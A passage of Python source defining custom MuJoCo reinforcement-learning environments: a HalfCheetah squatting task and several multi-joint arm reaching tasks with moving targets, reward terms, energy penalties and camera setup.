mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
@property
def is_healthy(self):
# state = self.state_vector()
#state = self.get_body_com("torso")
state=self.sim.data.get_geom_xpos('head')
min_z, max_z = self._healthy_z_range
is_healthy = (np.isfinite(state).all() and min_z <= state[2] <= max_z)
return is_healthy
@property
def healthy_reward(self):
return float(
self.is_healthy
or self._terminate_when_unhealthy
) * self._healthy_reward
@property
def done(self):
done = (not self.is_healthy
if self._terminate_when_unhealthy
else False)
return done
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
#x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
self.timestep += 1
#x_position_after = self.sim.data.qpos[0]
#x_velocity = ((x_position_after - x_position_before)
# / self.dt)
ctrl_cost = np.sum(np.square(action))#self.control_cost(action)
healthy_reward = self.healthy_reward
vec = self.get_body_com("torso")[2] - self.target_pos[2]
reward_dist = np.linalg.norm(vec)
horizontal_penalty=np.abs(sum([0, 0, 1] - self.sim.data.geom_xmat[1][6:9]))
#print(horizontal_penalty)
#forward_reward = x_velocity#self._forward_reward_weight *
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
#reward = forward_reward - ctrl_cost
ori_reward = - self._distance_weigth * reward_dist \
- self._ctrl_cost_weight * ctrl_cost \
- self._horizontal_weight * horizontal_penalty \
+ self._health_weight * healthy_reward
done = self.done
if self.timestep % self.flipstep == 0 and self.timestep != 0: # 2
if self.target_pos[2] <= self.target_low:
self.target_pos[2] = self.target_high
elif self.target_pos[2] >= self.target_high:
self.target_pos[2] = self.target_low
self.target_pos[0] = self.get_body_com("torso")[0]
self.target_pos[1] = self.get_body_com("torso")[1]
self.sim.data.site_xpos[self.target_site]= self.target_pos
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
# energy = energy + np.abs(action[i]) * delta_theta
energy = energy + np.sum(np.square(delta_theta))
        if not self._terminate_when_unhealthy:
            unhealthy_penalty = -5
            if not self.is_healthy:
                ori_reward += unhealthy_penalty
final_reward =ori_reward- self.energy_weights*energy
observation = self._get_obs()
info = {
'energy' : energy,
'reward_dist': -reward_dist,
'reward_ctrl': -ctrl_cost,
'horizontal_penalty': -horizontal_penalty,
'reward_survive': healthy_reward,
'ori_reward': ori_reward,
}
return observation, final_reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
body_orientation=self.sim.data.geom_xmat[1][6:9].flat.copy()
#distance=list(self.get_body_com("torso")[2] - self.target_pos[2] )
distance = [self.get_body_com("torso")[2] - self.target_pos[2]]
if self._exclude_current_positions_from_observation:
position = position[1:]
#observation = np.concatenate((position, velocity)).ravel()
if self._horizontal_weight != 0:
observation = np.concatenate(
(position, velocity,body_orientation, distance)).ravel()
else:
observation = np.concatenate(
(position, velocity, distance)).ravel()
return observation
def reset_model(self):
self.timestep=0
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = np.asarray([self.get_body_com("torso")[0], self.get_body_com("torso")[1], self.target_low])
observation = self._get_obs()
return observation
def viewer_setup(self):
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 1.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0.5 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0.5
self.viewer.cam.lookat[2] += 0
self.viewer.cam.elevation = 0 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
class HalfCheetahSquat6dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_squat.xml',
distance_weigth=5.0,
health_weight=1,
horizontal_weight=0.1, ##
ctrl_cost_weight=0.,
reset_noise_scale=0.1,
healthy_z_range=(0.2, 1),
terminate_when_unhealthy=False, ##
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
if terminate_when_unhealthy:
healthy_reward=1.0
else:
healthy_reward=0
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._healthy_reward = healthy_reward
self._health_weight=health_weight
self._distance_weigth = distance_weigth
self._horizontal_weight=horizontal_weight
self._terminate_when_unhealthy = terminate_when_unhealthy
self._healthy_z_range = healthy_z_range
self.target_low=0.25
self.target_high=0.7#0.65
self.joint_list=['bthigh','bshin','bfoot','fthigh','fshin','ffoot']
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
self.target_pos = np.asarray([0, 0, 0])
self.target_site=0
self.flipstep=75
self.timestep=0
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
@property
def is_healthy(self):
# state = self.state_vector()
# state = self.get_body_com("torso")
state = self.sim.data.get_geom_xpos('head')
min_z, max_z = self._healthy_z_range
is_healthy = (np.isfinite(state).all() and min_z <= state[2] <= max_z)
return is_healthy
@property
def healthy_reward(self):
return float(
self.is_healthy
or self._terminate_when_unhealthy
) * self._healthy_reward
@property
def done(self):
done = (not self.is_healthy
if self._terminate_when_unhealthy
else False)
return done
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
#x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
self.timestep += 1
#x_position_after = self.sim.data.qpos[0]
#x_velocity = ((x_position_after - x_position_before)
# / self.dt)
ctrl_cost = np.sum(np.square(action))#self.control_cost(action)
healthy_reward = self.healthy_reward
vec = self.get_body_com("torso")[2] - self.target_pos[2]
reward_dist = np.linalg.norm(vec)
horizontal_penalty=np.abs(sum([0, 0, 1] - self.sim.data.geom_xmat[1][6:9]))
#forward_reward = x_velocity#self._forward_reward_weight *
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
#reward = forward_reward - ctrl_cost
ori_reward = - self._distance_weigth * reward_dist \
- self._ctrl_cost_weight * ctrl_cost \
- self._horizontal_weight * horizontal_penalty \
+ self._health_weight * healthy_reward
done = self.done
if self.timestep % self.flipstep == 0 and self.timestep != 0: # 2
if self.target_pos[2] <= self.target_low:
self.target_pos[2] = self.target_high
elif self.target_pos[2] >= self.target_high:
self.target_pos[2] = self.target_low
self.target_pos[0] = self.get_body_com("torso")[0]
self.target_pos[1] = self.get_body_com("torso")[1]
self.sim.data.site_xpos[self.target_site]= self.target_pos
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
# energy = energy + np.abs(action[i]) * delta_theta
energy = energy + np.sum(np.square(delta_theta))
        if not self._terminate_when_unhealthy:
            unhealthy_penalty = -5
            if not self.is_healthy:
                ori_reward += unhealthy_penalty
final_reward =ori_reward- self.energy_weights*energy
observation = self._get_obs()
info = {
'energy' : energy,
'reward_dist': -reward_dist,
'reward_ctrl': -ctrl_cost,
'horizontal_penalty': -horizontal_penalty,
'reward_survive': healthy_reward,
'ori_reward': ori_reward,
}
return observation, final_reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
body_orientation=self.sim.data.geom_xmat[1][6:9].flat.copy()
#distance=list(self.get_body_com("torso")[2] - self.target_pos[2] )
distance = [self.get_body_com("torso")[2] - self.target_pos[2]]
if self._exclude_current_positions_from_observation:
position = position[1:]
#observation = np.concatenate((position, velocity)).ravel()
if self._horizontal_weight != 0:
observation = np.concatenate(
(position, velocity,body_orientation, distance)).ravel()
else:
observation = np.concatenate(
(position, velocity, distance)).ravel()
return observation
def reset_model(self):
self.timestep=0
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = np.asarray([self.get_body_com("torso")[0], self.get_body_com("torso")[1], self.target_low])
observation = self._get_obs()
return observation
def viewer_setup(self):
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 1.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0.5 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0.5
self.viewer.cam.lookat[2] += 0
self.viewer.cam.elevation = 0 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
```
#### File: gym/mujoco/vertical_arm.py
```python
import numpy as np
from gym import utils
from gym.envs.mujoco import mujoco_env
import os
from . import path
DEFAULT_CAMERA_CONFIG = {
'trackbodyid': 0,
'distance': 1.0,
'lookat': np.array((0.0, 0.0, 0)),
'elevation': 0,
}
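# Sinusoid helpers used by the arm environments below to drive the moving
# target trajectory.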
def sin(t, omega=1.5, phi=0.):
    return np.sin(omega * t + phi)
def cos(t, omega=1.5, phi=0.):
    return np.cos(omega * t + phi)
class VA(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
print(xml_file)
#utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder', 'elbow']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
def step(self, a):
#print(a)
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip")- self.target_pos
reward_dist = - np.linalg.norm(vec)
reward_ctrl = - np.square(a).sum()
reward = self.distance_reward_weight*reward_dist +self.ctrl_cost_weight*reward_ctrl
self.do_simulation(a, self.frame_skip)
self.t += self.frame_skip * self.real_time
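        # Offset the target site along a line tilted about 25 degrees from the
        # vertical in the x-z plane, oscillating sinusoidally in time.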
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [-0.15*sin(self.t,phi=0)*np.sin(-25* np.pi / 180.), 0,
0.15*sin(self.t,phi=0)*np.cos(-25* np.pi / 180.)+0.01]#,phi=1
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight*reward_dist,
'reward_ctrl': self.ctrl_cost_weight*reward_ctrl,
'ori_reward': reward
}
return ob, reward, done, info#,reward_ctrl=reward_ctrl
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
#self.data.site_xpos[0] = [1, 1, 1] -.15 0.01 -.1
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
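        # Observation: cos/sin encoding of the joint angles, any remaining qpos
        # entries, joint velocities, and the fingertip-to-target offsets in x and z.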
theta = self.sim.data.qpos.flat[:2]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[2:],
self.sim.data.qvel.flat[:2],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
class VA4dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm4dof.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
print(xml_file)
#utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder','shoulder2', 'elbow', 'elbow2']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
def step(self, a):
#print(a)
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip")- self.target_pos
reward_dist = - np.linalg.norm(vec)
reward_ctrl =- np.square(a).sum()
reward = self.distance_reward_weight*reward_dist +self.ctrl_cost_weight*reward_ctrl
self.do_simulation(a, self.frame_skip)
self.t += self.frame_skip * self.real_time
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [-0.15*sin(self.t,phi=0)*np.sin(-25* np.pi / 180.), 0,
0.15*sin(self.t,phi=0)*np.cos(-25* np.pi / 180.)+0.01]#,phi=1
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight*reward_dist,
'reward_ctrl': self.ctrl_cost_weight*reward_ctrl,
'ori_reward': reward
}
return ob, reward, done, info#,reward_ctrl=reward_ctrl
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
#self.data.site_xpos[0] = [1, 1, 1] -.15 0.01 -.1
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:4]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[4:],
self.sim.data.qvel.flat[:4],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
class VA6dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm6dof.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
print(xml_file)
#utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder','shoulder2', 'elbow', 'elbow2','elbow3', 'elbow4']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
def step(self, a):
#print(a)
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip")- self.target_pos
reward_dist = - np.linalg.norm(vec)
reward_ctrl =- np.square(a).sum()
reward = self.distance_reward_weight*reward_dist +self.ctrl_cost_weight*reward_ctrl
self.do_simulation(a, self.frame_skip)
self.t += self.frame_skip * self.real_time
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [-0.15*sin(self.t,phi=0)*np.sin(-25* np.pi / 180.), 0,
0.15*sin(self.t,phi=0)*np.cos(-25* np.pi / 180.)+0.01]#,phi=1
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight*reward_dist,
'reward_ctrl': self.ctrl_cost_weight*reward_ctrl,
'ori_reward': reward
}
return ob, reward, done, info#,reward_ctrl=reward_ctrl
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
#self.data.site_xpos[0] = [1, 1, 1] -.15 0.01 -.1
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:6]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[6:],
self.sim.data.qvel.flat[:6],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
class VA8dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm8dof.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
print(xml_file)
#utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder','shoulder2', 'shoulder3','shoulder4','elbow', 'elbow2','elbow3', 'elbow4']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
def step(self, a):
#print(a)
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip")- self.target_pos
reward_dist = - np.linalg.norm(vec)
reward_ctrl =- np.square(a).sum()
reward = self.distance_reward_weight*reward_dist +self.ctrl_cost_weight*reward_ctrl
self.do_simulation(a, self.frame_skip)
self.t += self.frame_skip * self.real_time
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [-0.15*sin(self.t,phi=0)*np.sin(-25* np.pi / 180.), 0,
0.15*sin(self.t,phi=0)*np.cos(-25* np.pi / 180.)+0.01]#,phi=1
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight*reward_dist,
'reward_ctrl': self.ctrl_cost_weight*reward_ctrl,
'ori_reward': reward
}
return ob, reward, done, info#,reward_ctrl=reward_ctrl
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
#self.data.site_xpos[0] = [1, 1, 1] -.15 0.01 -.1
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:8]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[8:],
self.sim.data.qvel.flat[:8],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
# pcx=0.05#0.05#0.32#-0.6
# pcy=0#0.32#-0.2 #-0.2
class RealArm7dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self, xml_file='real_arm7dof.xml',distance_reward_weight=5,
shoulder_cost_weight=0,wrist_cost_weight=0,pcx=0.05,pcy=0):
# utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['s_abduction','s_flexion', 's_rotation','e_flexion','e_pronation', 'w_abduction','w_flexion']
self.pcx=pcx
self.pcy=pcy
self.real_time = 0.01
self.frame_skip = 2 # 2
self.f=0.4
self.t = 0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight=distance_reward_weight
self.shoulder_cost_weight=shoulder_cost_weight
self.wrist_cost_weight=wrist_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
def step(self, a):
#a=0
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip") - self.target_pos
total_torque = a
reward_dist = - np.linalg.norm(vec)
#reward_ctrl = - np.square(total_torque).sum()
reward_shoulder = - np.square(total_torque[0:3]).sum()
reward_wristrot = - np.square(total_torque[4::]).sum()
reward = self.distance_reward_weight * reward_dist\
+ self.shoulder_cost_weight*reward_shoulder\
+ self.wrist_cost_weight*reward_wristrot
self.do_simulation(total_torque, self.frame_skip)
self.t += self.frame_skip * self.real_time
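        # Sweep the target site around an ellipse with semi-axes 0.22 and 0.18,
        # centered at (pcx, pcy) and raised by 0.1 in z, at frequency self.f.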
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + \
[self.pcx + (-0.22 * np.sin(self.t * np.pi * 2 * self.f)),self.pcy
+ (-0.18 * np.cos(self.t * np.pi * 2 * self.f)),0.1]
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight * reward_dist,
'penalty_shoulder': self.shoulder_cost_weight * reward_shoulder,
'penalty_wrist': self.wrist_cost_weight * reward_wristrot,
'ori_reward': reward
}
return ob, reward, done,info
def viewer_setup(self):
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 2.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0
self.viewer.cam.lookat[2] += 0.5
self.viewer.cam.elevation = -20 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
def reset_model(self):
self.t = 0
#self.init_qpos[1] = -3.142 / 2
self.init_qpos[3] = -3.142 / 2
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:7]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[7:],
self.sim.data.qvel.flat[:7],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[1] - self.target_pos[1]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
])
class RealArm6dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self, xml_file='real_arm6dof.xml',distance_reward_weight=5,
shoulder_cost_weight=0,wrist_cost_weight=0,pcx=0.05,pcy=0):
# utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['s_abduction','s_flexion', 's_rotation','e_flexion', 'w_abduction','w_flexion']
self.pcx = pcx
self.pcy = pcy
self.real_time = 0.01
self.frame_skip = 2 # 2
self.f=0.4
self.t = 0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight=distance_reward_weight
self.shoulder_cost_weight=shoulder_cost_weight
self.wrist_cost_weight=wrist_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
def step(self, a):
#a=0
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip") - self.target_pos
total_torque = a
reward_dist = - np.linalg.norm(vec)
#reward_ctrl = - np.square(total_torque).sum()
reward_shoulder = - np.square(total_torque[0:3]).sum()
reward_wristrot = - np.square(total_torque[4::]).sum()
reward = self.distance_reward_weight * reward_dist\
+ self.shoulder_cost_weight*reward_shoulder\
+ self.wrist_cost_weight*reward_wristrot
self.do_simulation(total_torque, self.frame_skip)
self.t += self.frame_skip * self.real_time
#self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [(p1x - p2x) * np.sin(self.t * np.pi*2*self.f) / 2 + (p1x + p2x) / 2, 0,(p1y - p2y) * np.sin(self.t * np.pi*2*self.f) / 2 + (p1y + p2y) / 2] # ,phi=1
self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + \
[self.pcx + (-0.22 * np.sin(self.t * np.pi * 2 * self.f)),self.pcy
+ (-0.18 * np.cos(self.t * np.pi * 2 * self.f)),0.1]
self.target_pos = self.sim.data.site_xpos[0]
ob = self._get_obs()
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(a[i]) * delta_theta
done = False
info = {
'energy': energy,
'reward_dist': self.distance_reward_weight * reward_dist,
'penalty_shoulder': self.shoulder_cost_weight * reward_shoulder,
'penalty_wrist': self.wrist_cost_weight * reward_wristrot,
'ori_reward': reward
}
return ob, reward, done, info
def viewer_setup(self):
self.viewer.cam.trackbodyid = 0 # id of the body to track ()
self.viewer.cam.distance = self.model.stat.extent * 2.0 # how much you "zoom in", model.stat.extent is the max limits of the arena
self.viewer.cam.lookat[0] += 0 # x,y,z offset from the object (works if trackbodyid=-1)
self.viewer.cam.lookat[1] += 0
self.viewer.cam.lookat[2] += 0.5
self.viewer.cam.elevation = -20 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)
self.viewer.cam.azimuth = 90 # camera rotation around the camera's vertical axis
def reset_model(self):
self.t = 0
#self.init_qpos[1] = -3.142 / 2
self.init_qpos[3] = -3.142 / 2
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:6]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[6:],
self.sim.data.qvel.flat[:6],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[1] - self.target_pos[1]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
])
class RealArm5dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self, xml_file='real_arm5dof.xml',distance_reward_weight=5,
shoulder_cost_weight=0,wrist_cost_weight=0,MinE_cost_weight=0,pcx=0.05,pcy=0):
# utils.EzPickle.__init__(self)
utils.EzPickle.__init__(**locals())
self.joint_list = ['s_abduction', 's_flexion', 's_rotation', 'e_flexion',
'w_flexion']
self.pcx = pcx
self.pcy = pcy
self.real_time = 0.01
self.frame_skip = 2 # 2
self.f=0.4
self.t = 0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight = distance_reward_weight
self.shoulder_cost_weight = shoulder_cost_weight
self.wrist_cost_weight = wrist_cost_weight
self.MinE_cost_weight =MinE_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
def step(self, a):
#a=0
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
vec = self.get_body_com("fingertip") - self.target_pos
total_torque = a
reward_dist = - np.linalg.norm(vec)
#reward_ctrl = - np.square(total_torque).sum()
reward_shoulder = - np.square(total_torque[0:3]).sum()
reward_wristrot = - np.square(total_torque[4]).sum()
#meanEff=np.abs(total_torque).sum()/len(self.joint_list)
#penalty_MinE=-(np.abs(total_torque)-meanEff).sum()
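        # Minimum-effort penalty: negative sum of squared commanded torques.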
penalty_MinE=- np.sum(np.square(total_torque))#self.control_cost(action)
# penalty_MinE = 0
# for i in range(len(self.joint_list)):
# delta_theta = np.abs( self.sim.data.qvel.flat[i])
# # energy = energy + np.abs(action[i]) * delta_theta
# penalty_MinE = penalty_MinE + np.abs(total_torque[i]) * delta_theta
# penalty_MinE= -penalty_MinE
reward = self.distance_reward_weight * reward_dist\
+ self.shoulder_cost_weight*reward_shoulder\
+ self.wrist_cost_weight*reward_wristrot
ori_reward=reward
reward = ori_reward+self.MinE_cost_weight *penalty_MinE
self.do_simulation(total_torque, self.frame_skip)
self.t += self.frame_skip * self.real_time
